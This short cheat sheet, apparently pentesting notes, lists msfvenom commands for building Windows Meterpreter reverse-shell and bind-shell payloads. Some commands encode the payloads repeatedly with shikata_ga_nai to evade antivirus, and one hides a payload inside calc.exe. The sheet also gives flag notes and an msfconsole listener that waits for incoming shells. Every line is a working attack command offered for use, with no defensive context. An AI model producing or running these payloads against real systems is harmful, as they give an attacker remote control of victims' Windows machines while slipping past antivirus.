Examples of previously created MSFVenom payloads required in the different scenarios
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -b "\x00" -f exe -o meterpreter.exe
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -b "\x00" -f exe -e x86/shikata_ga_nai -i 10 -f exe -o meterpreter.exe
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe -x calc.exe -e x86/shikata_ga_nai -i 10 -f exe -o meterpreter.exe
msfvenom --platform Windows -p windows/meterpreter/reverse_https HttpProxyUser=user HttpProxyPass=password LHOST= LPORT=443 -b "\x00" -f exe -o meterpreter.exe
msfvenom --platform Windows -p windows/shell_bind_tcp LPORT=443 -f DLL -o bind_shell.dll
-e encoder type
-i how man times to encode
-n the amound of bytes to add at the beginning
-b exclude bad chars (\x00 common filler, searched for by AV)
msfconsole -qx "use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set lhost;
set lport 443;
exploit -j"